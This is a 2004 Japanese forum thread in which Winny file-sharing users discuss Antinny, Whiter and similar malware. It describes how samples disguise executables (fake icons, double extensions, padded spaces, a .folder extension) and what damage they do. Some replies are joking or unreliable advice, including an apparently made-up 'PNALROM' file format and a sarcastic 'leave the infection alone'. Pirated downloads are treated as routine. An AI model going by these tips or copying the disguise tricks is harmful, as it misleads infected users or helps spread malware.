その策に見事にひっかかってクリックした俺が負け組なんだけどもね・・・

亜種だから発見されないのかね。こんな奴他にもおるかと思って聞いてみたですよ。
とりあえずAntinnyかと思って1の奴やってみたけどレジストリもファイルも無かったです。怖っ!

exe解析でもしてみようかと思ってさっき元ファイルを展開したら
本日最新の定義ファイルで見事Antinnyとして認識されますた。
やられますた・・・ダメPGですわ。みんなスマンカッタ。


97 :[名無し]さん(bin+cue).rar:04/03/03 19:49 ID:dMhEZqGi
>89
おそらく、それOS再起動で元に戻ってると思う。
レジストリの方もいじらないとだめかも。
てか、OS再構築だね。

98 :[名無し]さん(bin+cue).rar:04/03/03 20:05 ID:MrMc3nWF
Antinnyまとめ

● ANTINNY.A
○ フォルダアイコンに偽装
○ ノートン対応済
○ .mp3.lzh などの二重拡張子LHAアーカイブ内の .exe として流通

● ANTINNY.E
○ テキストファイルのアイコンに偽装
○ ノートン対応済
○ .txt.exe の二重拡張子で、単独で流通

● 名称未定
○ WMPファイルのアイコンに偽装
○ ノートン未対応
○ .mp3  (多数のスペース)  .exe として単独で流通
○ 使用者名を「Winnyで違法ファイル集めています」に変更
○ レジストリエディタを使用不能にする(窓の手などで復旧可)
○ システムの復元を使用不能にする(復旧困難。不可能かも?)

他にも亜種はあると思うが、今のところ報告が多いものをまとめてみた。
   

99 :[名無し]さん(bin+cue).rar:04/03/03 20:26 ID:y6dc636G
サイト経由からAnntiny亜種感染したくさい。
一時ファイルからハケーンしたよ。

100 :[名無し]さん(bin+cue).rar:04/03/03 22:55 ID:1WnSpXmo
>>63
おれも同じ症状だ。 復元できん・・
そのほかに、ノートンもメールチェックだけoffにする時がある。
毎回じゃないが・・。
どーも最新定義ファイルもしっかり落としてない気がする・・・。
「名称未定」(ANTINNY2?)はかなり手強い気がする。


あげ

101 :[名無し]さん(bin+cue).rar:04/03/03 23:37 ID:UZUJur90
Whiterってノートン先生のシステムスキャンで引っかかるの?


102 :[名無し]さん(bin+cue).rar:04/03/03 23:57 ID:qgpsxTCG
データベースに登録されてればな。

新種や亜種は未登録の場合があるから、引っかからないことがある。
あと、ただコマンドを記述しただけのbatだったりすると対応して貰えないと思われ。

103 :[名無し]さん(bin+cue).rar:04/03/04 00:26 ID:IFcJYdF5
書庫の中の書庫が壊れててウィルススキャンもできんのだけどんも
これはだ い じょう ぶなのでしょうか?

104 :[名無し]さん(bin+cue).rar:04/03/04 00:27 ID:Ya9LaukH
すいませんが、おじゃましますよ
同じくtxt.exeにひっかかってしまいました
Antinnyが1つあったので削除しましたが
システムの復元を無効にしてから再起動してみましたが
nyフォルダのBbsは異常なし、キャッシュも消されず
レジストリを覗いても>>65の通り異常なしだったし
再起動後システムの復元を有効に変更できたし
どこかに異常が出来たのか、駆除できたのかよくわからん

このままほっといて大丈夫なものなのか教えてください
Antinnyだとキャッシュが消されるくらいの被害ですむ?

105 :[名無し]さん(bin+cue).rar:04/03/04 00:36 ID:2Tf41LhH
>>62
乙カレー

106 :[名無し]さん(bin+cue).rar:04/03/04 00:40 ID:fjJ63D6q
コマンドプロントが一瞬だけ起動することが時たまあるんだけど、これ何?

107 :[名無し]さん(bin+cue).rar:04/03/04 00:40 ID:E6bBDZot
>>104
見ず知らずの人に大丈夫と言われて安心できるんですか

108 :[名無し]さん(bin+cue).rar:04/03/04 00:44 ID:Ya9LaukH
>>107
ここの人なら詳しそうだから何となく安心する
というか対処方法かそのヒントを説明してくれそう
それでも駄目なら諦める

109 :[名無し]さん(bin+cue).rar:04/03/04 00:47 ID:9JsXtv0d
>>104
大丈夫。放置でOK。気にするな。忘れろ。
もしかしたら、ある日突然HDD全データ消滅とか、アタックの踏み台になってたとか、
あるいは個人情報垂れ流してたとかあるかもしれないけど、大丈夫。
被害はPCだけだし、最悪でも逮捕されるくらいだから。

>>106
ゲームやアプリのセットアップとかでは希にあるけど……

これ何?って、コマンドプロンプトだろう。内容がセットアップかWhiterかなんてそれぞれだから何とも答えられんな。

110 :[名無し]さん(bin+cue).rar:04/03/04 00:47 ID:K/mesqdE
>>106
極めて危険です

コマンドプロンプトで(*´Д`*)ハァハァ←をコピーした後、
右クリックから貼り付けて実行してください


111 :106:04/03/04 00:59 ID:fjJ63D6q
HDDノンクラッシュソフトが原因だったっぽい

112 :[名無し]さん(bin+cue).rar:04/03/04 01:00 ID:SMRVWGOw
例のtxt.exeがノーdでAntinnyとして検出されるようになったようだけど、
駆除の仕方が相変わらずわからない。ノーdに書いてある方法は全然出来ないし、
駆除の必要無いのかな?というか、ノーdに書いてあるファイルサイズが違う…

113 :[名無し]さん(bin+cue).rar:04/03/04 01:16 ID:sEMI9aOp
つかさ、解決策として、アイコンほをカスタマイズしましょうよ。
俺は殆どのアイコンを変えてるから…。
窓の手やIconset_XPを使えば簡単に変更できますし、時間もかかりません。

114 :[名無し]さん(bin+cue).rar:04/03/04 02:03 ID:WOyJCdYx
まめFILEでアイコン非表示にしてるから惑わされることもない・・・

115 :[名無し]さん(bin+cue).rar:04/03/04 02:27 ID:Ub6aoD6T
そもそもエクスプローラ使わないからアイコンに惑わされることはない

116 :65:04/03/04 02:33 ID:jQYVd3G8
>>44
中身はtxt.exeのAntinnyと.folderのファイルでした。
.folderを実験的に開こうとしたら、
「現在のセキュリティの設定では、このページのActiveXコントロールは云々...」
と表示されました。IE6のScript・ActiveX・JAVAを有効にしても結果は同じ。XPにて実験。

>>73
【アルバム】 2004.02.18 CHEMISTRY 「One × One」.zip
中身はtxt.exeのAntinnyと.folderのファイル。

>>75
どのような募集だったか詳細希望。

>>80
エラーメッセージをGoogleで検索しても解決策はほとんど見つかりませんでした。

>>101
WhiterはEzipで圧縮すると、NAVに怒られなくなります。注意です。

>>103
もう少し情報を。ハッシュだけでも貼っていただきたい。

>>112
テンポラリ・システム・ウィンドウズの各フォルダ内を、更新日時でソートして、
txt.exeを実行してしまった時間の近辺に作成されたファイルをまずは怪しみましょう。
レジストリ等のスタートアップもチェック。

117 :[名無し]さん(bin+cue).rar:04/03/04 04:19 ID:2QdyQQz2
>>91
.folderという拡張子だとフォルダアイコンになって、
そこにウイルスを仕込めます。

118 :mp3.exe text.exe どちらか開いたものです:04/03/04 04:26 ID:gtAOAAM+
antinny E でなく、antinnyのまた亜種のほうにやられました
システム管理者があの 違法ファイルあつめてますになり、レジ制限、システムの復元不可になったやつですね
MSIME2002というプログラムが起動時に同時起動しますので、それを毎回終了
Hキーローカルマシーン (省略)ウィンドウズのRUNで 
スタートアップ時に危険そうな値を削除したかったのですがどれかわからず
(前スレ 今スレにかかれているような値はなかったです)
そして恐ろしいことに。。。
しばらくMSIME2002を試験的に放置していたら、デスクトップアイコンが次々に消え
マイドキュメントの中身は空に (誰かが移動しておいたほうがいいといっていましたね、そのとーり)
Cドラ プログラムファイルに置いておいたのが運のツキなのか
そうそう、このウィルス jpgをすばやく消すようです・・・。
前々日にオンラインスキャンをしてバックドアを除去して安心してしまったのがいけなかったのか。。。後悔の嵐。。。
BIOSもやられてるんなら やっぱりクリーンインスコなんでしょうか。。。

119 :[名無し]さん(bin+cue).rar:04/03/04 06:00 ID:xpgRYdSx
mpgとmp3のファイルが スペース.exeになってつかえなくなったよ(/_;)
MSIME2002ってのがいけないの?

120 :[名無し]さん(bin+cue).rar:04/03/04 06:27 ID:xpgRYdSx
窓の手の自動実行みたらえらいことになってたよ。
mpg4dmod
instcat
plustab
nwapi32
等々



121 :[名無し]さん(bin+cue).rar:04/03/04 06:40 ID:DbilKkKL
>>118
BIOSがやられてるならBIOS更新か要M/B交換かと・・・

122 :[名無し]さん(bin+cue).rar:04/03/04 07:02 ID:sDzB5Jvd
     \    |       ,,...-‐‐‐--、,      l    /
     |、  /  |   ,.べ;;;;;::、--- 、:::;;`ヽ、   ''‐-‐'゙/
   、,_,.! ゙'-'゙(.    //::/´       ``ヾ、      l
    )    (.  /:,`!ヾ、.      ,      ゙>-    ヽ、_,,
   '゙"`ヽ, /``/::;:゙;゙::!:.:| ``'''‐--‐''゙   '-‐'゙ ゙、       /
     ヽ ヾ /:;'/:.:!:::l  、,r''"゙`'ヾ    ,:',-‐-、,'l      /
   -=,'゙   ./:::/:.:.|::::l  /  (・),.    ヾ,_(・) ,'゙l      (
     `ヽ ,゙:::,'::::;':!::::l   `"´ ''"´     | ̄__,,l,,...,,_   \   ひぃっ!
     -='゙ l::::l::::;':. l:::::l               ` ゙、.,,_,,.``ヽ、
     __) l!゙,l:::;'-、 ';::::!          ,.-‐‐:、    l `ヽ、  \   なんなんですか この人たちは!!!
      ヽ. !:l:::l/-ヽ.゙;::',    U    /:::::::::::r=‐'''"´`''‐,.-゙'‐-、ヽ.
       ) ゙!::l l"''、l ヾ゙:、   u     l:::::::::::::::`'''‐‐''''‐i'゙  ,,..、  `\
         l:::l,ヽ、_,  ヾ;\       ゙、.,,_ノ/ ̄ ̄ノ /ヽ. `   \     ____
     /    !::l:゙ヽ、. ,、 ヾ、;、         ゙'‐''"7'゙/ /゙ヽ       \ _,./´-、ヽ
   / /  l::l``;::,`´:ヽ、  `ヾ:;、.,__   ::::   / `'''゙  \   ゙、   ヾ;‐、''-、゙;
    /  / l:l ";'::;'::';';! `''‐ 、.,_` ̄      / r'゙´ ̄ ̄``'''‐、 ゙、    ' l  l:::!
.       /  l:!  !:;'::!::::;!     ``'''‐‐---┬'゙   `'''''''''‐-、      ゙、   ./  l:::l

123 :Norton AntiVirus:04/03/04 09:37 ID:tqqIiyzW
以下のファイルは、脅威名W32.HLLW.Antinnyでした
【写真集】 う 上戸彩「キスしていいですか。」.exe
【盗撮】加藤あい温泉盗撮【盗撮大好きタシーロ】【焙煎にんにく】.ram.exe


124 :[名無し]さん(bin+cue).rar:04/03/04 10:09 ID:z0RSrgAI
これも
(写真集) 長谷川京子−key of life.ZIP
(写真集) 熊田曜子 - 「gal series」.zip

125 :[名無し]さん(bin+cue).rar:04/03/04 10:33 ID:pYB9B5ep
txtアイコンの変更ってどうやってするんですか?
窓の手を使ってみたのですが、アイコン(1)(2)共にtxtアイコンがないので
変更の仕方がわからないです。

誰か教えてください。

126 :[名無し]さん(bin+cue).rar:04/03/04 10:34 ID:LIlgCdb7
>>125
スレチガイ

127 :[名無し]さん(bin+cue).rar:04/03/04 11:04 ID:eATj4C8T
パソコンを起動するとwinrarの解凍画面が
20〜100位出てくるんだけど
これってウイルス?

128 :[名無し]さん(bin+cue).rar:04/03/04 11:59 ID:tqqIiyzW
画像ファイルでウイルス感染って話がたまにあるけど
ファイル名の見落としは別にして(実はプログラムファイル)
画像ファイルからウイルスに感染(というよりウイルス本体が活動?)ってのは
それ以前にプログラムファイルなりを触ってないと起きないでFA?

>>127
>>127氏が)意図していない行為をPCがしているなら
ウイルスに感染してるんじゃない?

129 :[名無し]さん(bin+cue).rar:04/03/04 14:28 ID:nodYAKv/
Antinnyですが、これって解凍しただけでは感染しないのですよね?
解凍してできたフォルダ風のアイコンの.exeをクリックしたら感染しましたが
それさえクリックしなければ感染しないみたいです。

130 :[名無し]さん(bin+cue).rar:04/03/04 14:35 ID:LIlgCdb7
>>129
亜種じゃなきゃね。

131 :129:04/03/04 14:52 ID:nodYAKv/
>>130
ANTINNY.Aって奴です。
こないだ落とした.lzhを解凍した時は同じ名前のフォルダが2つ形成されてました。
1つは本物で1つは偽装した.exeです。偽装した.exeの方をクリックして感染しました。
今日同じ物を落として解凍したのですがノートンで全スキャンかけても反応がなかったので、
もしかしたら解凍してできたフォルダ型の.exeさえクリックすればただ解凍しただけでは、
感染しないのでは?と思い聞きに来ました。

どうもでした。

132 :[名無し]さん(bin+cue).rar:04/03/04 15:46 ID:gFVPG/X/
>>131
頭悪そうだな。

133 :[名無し]さん(bin+cue).rar:04/03/04 18:39 ID:YC2+cuuJ
グダグダ言ってる暇があったら.lzhも.exeも無視れ、話はそれからだ。

134 :[名無し]さん(bin+cue).rar:04/03/04 18:51 ID:0nFRpk+i
あれをクリックするヴァカも珍しいわけだが

135 :[名無し]さん(bin+cue).rar:04/03/04 18:53 ID:jm8+8EKK


01.jpg .exe 400,384

ってのがあったよ。

ノートンじゃ反応無し。
欲しい人&確かめてくれる人

[シリアル]Pandora - 2004年03月04日版(アップデート).lzh 2,061,370 d6194668b399242eb244e14934f50dd4

んじゃ報告まつ

136 :[名無し]さん(bin+cue).rar:04/03/04 18:59 ID:K/mesqdE
怪しい実行ファイルやらはイメージ化して、
VPCにエミュレートしたOSにキャプチャーして実行



137 :ko:04/03/04 19:49 ID:sr+BQewf
ウイルスが感染しない・埋め込めないフォーマットが知りたいのですが・・・。

138 :[名無し]さん(bin+cue).rar:04/03/04 19:55 ID:1R6S2ZPj
カスタムWinny誕生!

http://tmp2.2ch.net/test/read.cgi/download/1077880751/


初期ノードリスト
http://nynode.info/custom5/1/

WinnyinLaputa 3大陸目
http://host.deluxnetwork.com/~winny/


139 :[名無し]さん(bin+cue).rar:04/03/04 21:24 ID:Lx+xGVVP
>>136
あ、なるほど…
VMWare上に仮想ny専用マシンを作って
そこで確認してからってのが
たとえbios壊されるよーなウィルスでも
一番安心ぽい?

140 :[名無し]さん(bin+cue).rar:04/03/04 21:33 ID:+m0LpZXc
>>133
あのーexeはわかるんですけど
lzhを無視するのはなぜ?

ただの圧縮じゃないの?

141 :[名無し]さん(bin+cue).rar:04/03/04 21:42 ID:u5uXLQV5
hage

142 :[名無し]さん(bin+cue).rar:04/03/04 21:45 ID:lQoFROK4
>>140
anntinyの排泄物。

143 :[名無し]さん(bin+cue).rar:04/03/04 21:57 ID:pio8vm4a
>>140
解凍して実行してみれば分かるが、95%がウイルス入り、5%がゴミ。

144 :[名無し]さん(bin+cue).rar:04/03/04 22:01 ID:K/mesqdE
>>139
Virtual PCの他にVMWareってのがありましたか…
仮想ny専用機いいですね
BIOSを破壊するウィルスの数は極少量かと思いますけどかなり心強いと思われ

145 :[名無し]さん(bin+cue).rar:04/03/04 22:01 ID:UVTSj+vw
>>139&118
BIOS破壊なんて滅多にないよ。。。

146 :[名無し]さん(bin+cue).rar:04/03/04 22:57 ID:sr+BQewf
ウイルスが感染しない・埋め込めないフォーマットが知りたいのですが・・・。

147 :[名無し]さん(bin+cue).rar:04/03/04 23:00 ID:sr+BQewf
ウイルスが感染しない・埋め込めないファイルフォーマットが知りたいのですが・・・。

148 :[名無し]さん(bin+cue).rar:04/03/04 23:08 ID:3q0trToc
ウイルスが感染しない・埋め込めないフォーマットが知りたいような知りたくないような、よく解らないのですが・・・。

149 :[名無し]さん(bin+cue).rar:04/03/04 23:21 ID:9JsXtv0d
>>147
ないよ。
そんなものはない。

殆ど感染してない・埋め込まれてないものはあっても、感染しないもの・埋め込めないものはないよ。

150 :[名無し]さん(bin+cue).rar:04/03/05 00:56 ID:xjMZcyej
>>147
PNALROMなら現実的な驚異としてのウイルス感染とは無縁であろう。
オリジナルと1bitでも異なればデータ全体が意味をなさなくなる構造なので、
追記も書き換えも不可能。
改竄チェックに用いる電子署名の強度はStandard Trackで8192bit。
解析するには地球シミュレータを使っても20年はかかる計算になる。
ただし、署名した本人ですら書き換えることができない完全ReadOnly。
米国ナショナルアーカイブの永久保存文書の研究用フォーマット。

151 :[名無し]さん(bin+cue).rar:04/03/05 04:18 ID:lhRZRq9P
>>135
00.jpg(多数のスペース).exe
01.jpg(多数のスペース).exe
02.jpg(多数のスペース).exe
.
.
.
07.jpg(多数のスペース).exe
08.jpg(多数のスペース).exe

が入っていた。アイコンはXPのjpgのアイコンではなく、ビューワ関係のものだと思う(見たことがあるが何のアイコンか分からない)。

下記のレジストリを操作しているのかもしれない。

"RegisteredOwner"
ユーザ名
"RegisteredOrganization"
会社名(だと思う)
"Default Mail Account"
"SMTP Email Address"
上の二つの組み合わせにてOEに登録されているメールアカウントのメールアドレス
"User.NET Messenger Service"
MSNメッセンジャ関連(だと思う)

下記のファイル名のファイルを作っているのかもしれない。
"regedit.exe"
"regedt32.exe"
"notepad.exe"

ところで、ファイルの更新日時の改ざんは可能でしたでしょうか。
というのも、更新日時が1980・1990年代なのです。

152 :135:04/03/05 10:01 ID:OIF1KGJn
>>151

regeditってレジストリをいじるときのコマンドでしたよね。
何なんだろ。
今年はパンドラ系の捏造多いなぁ。
サイズとファイル名で大体分かるのだが

WEBで落とすと100%本物なので味気ないし。
やっぱny使わないとね。

ありがとでした。

153 :[名無し]さん(bin+cue).rar:04/03/05 13:13 ID:H0AKub74
今まで何の問題も無く再生出来ていたmpegファイルが
何日か前から正常に再生されなくなってしまいました。
症状としては音が出ないまま動画が再生され、開始10秒程すると止まってしまい
このプログラムは応答していません、とエラーが表示されます。

ウイルスか何かに感染しているのかと思い、チェックしてみたところ
BKDR_SUB722Pというのに感染していました。
これのせいで外部からの侵入を受けて、リモコンされどこか書き変えられてしまったのでしょうか?
ちなみにaviは問題無く再生できます。
どなたか何かわかる方がいたら、教えて下さい。

154 :[名無し]さん(bin+cue).rar:04/03/05 14:30 ID:bbMHmN/7
>153
何でチェックしたんだ?

155 :153:04/03/05 17:59 ID:H0AKub74
トレンドマイクロ・オンラインスキャンです。
ソフトを購入していなくても、簡易チェックが出来るページです。
ttp://housecall.antivirus.com/housecall/start_jp.asp

156 :[名無し]さん(bin+cue).rar:04/03/05 18:16 ID:enpdFyou
>>155
nyやるのにアンチウイルス入れてねーのかよ!?
あと、そのオンラインスキャンは有名でみんな知ってるから説明はいらん
というか駆除してないのか・・・

157 :153:04/03/05 18:56 ID:H0AKub74
駆除方法を参考に対処はしてあります。
ですが、やはりmpegファイルは再生出来ませんでした。
ウイルス感染は何回もありますし、ハードディスク全消去も2回喰らいましたが
大事なデータが入っているPCでもないので、アンチウイルスソフトは入れてませんでした。
原因わからなそうだし、仕方ないので再インストする事にします。

158 :[名無し]さん(bin+cue).rar:04/03/05 19:00 ID:0Gleto1T
ウイルスに引っかかる香具師って詐欺に引っかかるのと同じやね。



159 :[名無し]さん(bin+cue).rar:04/03/05 19:04 ID:LPtntpen
>>158
例外もあるけどな。

160 :[名無し]さん(bin+cue).rar:04/03/05 19:41 ID:D/qbpO0R
俺もなんか亜種感染しったっぽいんだが
Cだけ再インストすりゃいいのかな。外付けにあるnyのシステムやらがあるフォルダはそのまま使用して大丈夫ですかね?

161 :[名無し]さん(bin+cue).rar:04/03/05 21:03 ID:cGjtMRBK
こんなにおもしろいワンダーランドではウイルス職人の高笑いが聞こえそうだ。
もまいらちいとは警戒しろよ。w

162 :[名無し]さん(bin+cue).rar:04/03/05 21:09 ID:0Gleto1T
>>159
そうか?俺はリアルでもネットでも一度も引っかからん。
人間不信が傷だが。

163 :[名無し]さん(bin+cue).rar:04/03/05 21:47 ID:kpyTaidM
せめてdownフォルダだけでも表示を「詳細」にしときゃいいのに。
そうすりゃ、.mp3(多数のスペース).exe は「アプリケーション」って表示されるし、
拡張子.folderのファイルも「フォルダ」って表示されるじゃん。
普通のフォルダは「ファイル フォルダ」って表示されるから区別つくでしょ。

164 :[名無し]さん(bin+cue).rar:04/03/05 21:50 ID:3bnxgtNP
デーモソでマウントする時はshift押しながらマウントして
ウィルスチェックってことでOK?

165 :[名無し]さん(bin+cue).rar:04/03/05 21:56 ID:VNFS+4PX
ここは初心者スレか?

166 :[名無し]さん(bin+cue).rar:04/03/05 22:13 ID:/gKyLUET
引っかかる奴が馬鹿なだけなんだよ。
こっちは新種のワームやウイルスの情報を求めてるのに
引っかかりましたどうすればいいですかなんていちいち相手にしてられっかよ
と言うのが本音

マジで>>1見てから質問してくれ

167 :[名無し]さん(bin+cue).rar:04/03/05 22:24 ID:X/Ihz8D0
【写真集】伊藤裕子 有料サイトのなんとかかんとか.zip

anntiny見事にやられちゃったよ
まあ外付けHDのキャッシュ6Gしかなくてそろそろ買い足そうと思ってたんだよ
明日買いに行こうっと

168 :[名無し]さん(bin+cue).rar:04/03/05 22:33 ID:o/5+wlAB
anntinyの被害おさまらんね もうどのくらいたつのかな? なんで感染するのかわからんけど

169 :[名無し]さん(bin+cue).rar:04/03/05 22:45 ID:Ue6W3mto
>>151
>ファイルの更新日時の改ざんは可能でしたでしょうか。

可能です。某有名ツール(怪しくないです)を使えば、誰でも簡単に出来ちゃいまつ。

170 :[名無し]さん(bin+cue).rar:04/03/05 22:52 ID:feJaqegj
>>169
Nで始まるヤツか?(俺はこれを使ってるんだが)
でもこれだとフォルダの更新日時が変えられないんだよねぇ。

(´-`).。oO(フォルダの場合は新しくフォルダ作って移せばOKなんだけどさ)

171 :[名無し]さん(bin+cue).rar:04/03/05 23:48 ID:Tys5ZYk+
更新日時を変更するものなんて、Vectorにいくらでもあるだろ。

172 :名前:[名無し]さん(bin+cue).rar:04/03/06 01:20 ID:oD2JwKL7
最近Winnyを終了すると必ずTCP(インバウンドアクセス)
がしつこく始まるようになったんですけど、これってやっぱトロイですかねえ

173 :[名無し]さん(bin+cue).rar:04/03/06 01:26 ID:2OsfcWsk
違うんじゃない? よくわからんけど、切る前に繋がっていた相手か出回っているキー情報かだと思ふ

174 :[名無し]さん(bin+cue).rar:04/03/06 01:28 ID:oD2JwKL7
なるほど
ノートン先生も無反応だから、その線かもしれませんね

175 :[名無し]さん(bin+cue).rar:04/03/06 02:16 ID:BF3tLWPU
Whiterみたいに再起動時にHDのファイルを消すウィルスで
スタートアップフォルダに『bug.exeへのショートカット』
Cドライブのルートに『bug.exe』と『Winny.sys』
Documents and Settingsフォルダ内のスタートメニューフォルダに
『Setup.bat』
というファイルを作るウィルスをこの前踏んでしまったんだけど、
このウィルスの名前分かります?
ノートン先生は反応しませんでした。


176 :[名無し]さん(bin+cue).rar:04/03/06 03:06 ID:5R5/DUd4
http://headlines.yahoo.co.jp/hl?a=20040305-00000007-vgb-sci

お前らのせいだぞ

177 :[名無し]さん(bin+cue).rar:04/03/06 03:08 ID:zGR3DJ5s
>>175
>>13じゃない?

178 :151:04/03/06 03:12 ID:jjZhVPk4
>>169-171
ベクターにて「更新日時」で検索したところ、何十件も引っかかりました。
これまで、更新日時を変更したいと思ったことがないため、こういうソフトがあることに気づきませんでした
アドバイスありがとうございました。

>>170
どういう用途に使ってますか。こういうソフトは偽装以外に使途があるのか、いまいち分かりません。
フォルダですが、「タイムスタンプ変更ツール」で可能です(NT/2000/XP限定)。

>>175
前スレで見たような気がします。

179 :[名無し]さん(bin+cue).rar:04/03/06 05:04 ID:13X9hM8j
>>178
ファイルの時刻変更の用途だけど、
自作アプリの作成日時を統一するのに使ったりするんだよ。
Ver1.03 だったら、1:03 に揃えたりとかね。

あとは、エンコしたmp3をCDの発売日にしておくとか。

アイデア次第で用途はいくらでもある。


180 :[名無し]さん(bin+cue).rar:04/03/06 05:15 ID:13X9hM8j
>>152
> regeditってレジストリをいじるときのコマンドでしたよね。

コマンドって。。。
regedit.exe はレジストリエディタそのものなんだが。。。

まぁ、format だって「DOSの外部コマンド」とかいう呼び方をしていたから
コマンドでもいいのか。。。

181 : :04/03/06 06:38 ID:nebYNS+5
>>175
Whiter対策 (2chより抜粋)
ttp://mxtrojan.at.infoseek.co.jp/column02.html

182 :[名無し]さん(bin+cue).rar:04/03/06 08:07 ID:FMrdDyBI
今朝、あと九一七にやられたよ、ファイル全部消されるやつ。一六のときもこれあったらしいな。まだ対処方考え中。起動すら無理。FINALDATAでいけるのこれ?会社ついたらもちっと調べる。

183 :[名無し]さん(bin+cue).rar:04/03/06 08:13 ID:LN/8Jfmc
【IT】ACCSサイトが大量アクセスで一時停止 当面は夜間閉鎖へ【ウイルスか?】
http://news5.2ch.net/test/read.cgi/newsplus/1078513170/

184 :182:04/03/06 09:31 ID:ZzceF3yd
すまん会社からだがあとく16のファイル全消去される奴って
Whiterだった?そういう情報集めてるサイトあったんだが消えてる臭い。
あとく17も同じ物仕込んでやってると思うんだが。
WhiterだったらFINALDATA無理のような。どーしよ。

185 :[名無し]さん(bin+cue).rar:04/03/06 09:43 ID:gW+H4Cuu
>>184
無理アキラメレ。

186 :[名無し]さん(bin+cue).rar:04/03/06 11:13 ID:C57YoDHi
いつのまにか、nyのフォルダに(null)って書いてあるテキストファイルが出来てます。
これは何なのでしょうか?

187 :[名無し]さん(bin+cue).rar:04/03/06 11:14 ID:pEenLEw1
>>186
ガッ

188 :[名無し]さん(bin+cue).rar:04/03/06 11:25 ID:elVsObra
ATOKくらい買ってやれよ
MSIMEに不満があるなら買え!

189 :[名無し]さん(bin+cue).rar:04/03/06 11:43 ID:6ra74wAr
>186

高負荷になると出ることがあるらしい
普通に削除して無問題

しかし、なぜ高負荷になったのかが問題
動画再生などWinnyしながら他のソフトを動かしたからか?
ウイルス・ワームの類が活動した結果なのか?

190 :151:04/03/06 11:49 ID:jjZhVPk4
>>179
なるほど、ありがとうございました。

191 :[名無し]さん(bin+cue).rar:04/03/06 12:06 ID:eoSzzFKB
何気なしにnyをはじめて1ヶ月。
ふとAVGを走らせて見た・・・。
トロイ9個って俺は死んできたほうがいい?


192 :[名無し]さん(bin+cue).rar:04/03/06 12:17 ID:OoAuW/bx
  _____________ノ|
  |;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;<ノ|
  |;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;/
  |;;;;;;;;;;;/三────;;;;;;;;;;;;;;;;;;;;;;;>
  |;;;;;;;;;;;|∠二二ゝ ヽ二二|
  |;;;;;;;;;;;|三く( ()   ( ()ノ|ヽ
  |/⌒ヽ|三     \   ソ  
   |б三三   _ ̄  .| / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   ヽ三/三   ̄ ‐ ̄ /< もう終わりだ…お前ジャイアンに殺されるぞ・・・
    /ヽ\       /  \____________
    ゞ:::( \_____/

193 :182:04/03/06 12:19 ID:ZzceF3yd
>>184
FINALDATAでも無理っすか?あれ、やっぱりWhiterだったんですか。
適当にダウン登録してたらなぜかATOK17が単体落ちてきてたんで
ラッキーかも。とか思ってどんな感じか試用したかっただけぽ。
朝だったし頭ぼけっとしてたな。
ちなみに一太郎正規ユーザーなんですよねー。
一応いつもATOK単体だけ買ってます。っていうかもう16で満足しとけよ、漏れ。
とりあえずFINALDATAをCDブートして出来るだけやります。
念の為他のサルベージソフトも買ってきます。高くついたぜこん畜生。

194 :186:04/03/06 12:40 ID:C57YoDHi
>>189
なるほど。どうもありがとうございます。
おそらく動画再生ではないかと思います。


195 :[名無し]さん(bin+cue).rar:04/03/06 12:43 ID:unRo5Gjb
>>28>>30
WindowsXP Homeだとグループポリシーエディタgpedit.mscが使えないから、
http://www.vector.co.jp/soft/win95/util/se279389.html
簡単にCDのautorunを抑制できるのを追加しておいてくれ。



196 :[名無し]さん(bin+cue).rar:04/03/06 13:04 ID:Jg1QeQd5
>>195
>>12
>・CD/DVDの自動実行はオフ。
>各OSでのやり方は↓。また窓の手などでソフトで簡単にオフに出来る。[必須]


197 :[名無し]さん(bin+cue).rar:04/03/06 13:12 ID:unRo5Gjb
>>196
Σ(゚д゚lll)ガーン










;y=ー( ゚д゚)・∵. ターン

198 :[名無し]さん(bin+cue).rar:04/03/06 13:13 ID:Jg1QeQd5
今度から>>1に↓みたいに流行パターン載せた方がいいかな?とオモタ

anntiny以外の流行パターン
・exeの前にスペースたくさん
・.folderの拡張子
・autorun+bat

199 :[名無し]さん(bin+cue).rar:04/03/06 13:15 ID:pEenLEw1
folderって拡張子初めて聞いた 勉強になった

200 :[名無し]さん(bin+cue).rar:04/03/06 13:59 ID:qqdneOwM
↓のように同名のファイルが増殖してるんですけど、これは何ですか?
サイズは多少違ったりしてるけど、ファイル名・トリップなどはそのままのようです

(シングル) 2004.02.25 Every Little Thing  ソラアイ.zip 13,312,096
(シングル) 2004.02.25 Every Little Thing  ソラアイ.zip 13,138,371
(シングル) 2004.02.25 Every Little Thing  ソラアイ.zip 13,138,360
(シングル) 2004.02.25 Every Little Thing  ソラアイ.zip 13,103,282
(シングル) 2004.02.25 Every Little Thing  ソラアイ.zip 13,138,371
(シングル) 2004.02.25 Every Little Thing  ソラアイ.zip 13,138,269
(シングル) 2004.02.25 Every Little Thing  ソラアイ.zip 13,277,268
(シングル) 2004.02.25 Every Little Thing  ソラアイ.zip 13,138,370
(シングル) 2004.02.25 Every Little Thing  ソラアイ.zip 13,312,111
(シングル) 2004.02.25 Every Little Thing  ソラアイ.zip 13,138,267

201 :[名無し]さん(bin+cue).rar:04/03/06 14:20 ID:818K5eBV
>>200
どれか一つが本物で、後はウイルス入り。
若しくは全部ウイルス入り。

202 :[名無し]さん(bin+cue).rar:04/03/06 14:42 ID:DAKLUcCL
>>200
大抵一番サイズの小さいものが本物の確率が高い。

203 :[名無し]さん(bin+cue).rar:04/03/06 16:21 ID:eoSzzFKB
>>201-202
めっちゃひとごと、テキトーな返事ワロタ

204 :[名無し]さん(bin+cue).rar:04/03/06 16:28 ID:OFwwnFVN
もせフォルダに「badframes.stt」って急に現れたんだが、これは何?

205 :204:04/03/06 16:30 ID:OFwwnFVN
解決、スマン先に検索するべきだった・・・
ただのゴミだった

206 :[名無し]さん(bin+cue).rar:04/03/06 19:55 ID:ZnVZ8MOg
さっき、画面に血みたいな
丸いのが点々と出てきたんだけど
何かのウィルスに感染した?
バスター警告出なかったんだけど・・・

207 :[名無し]さん(bin+cue).rar:04/03/06 19:56 ID:gW+H4Cuu
>>206
それはニダだね。

208 :[名無し]さん(bin+cue).rar:04/03/06 19:58 ID:ZnVZ8MOg
>>207
レスどうもです。
ニダってなんですか?
詳しくお願いします。m(__)m

209 :[名無し]さん(bin+cue).rar:04/03/06 20:08 ID:TTfJYp+Q
さっき亜種anntiny自己解決したので報告しときます。

ノートン先生常駐、昨夜完全スキャンも無反応。(定義ファイル最新upd済)
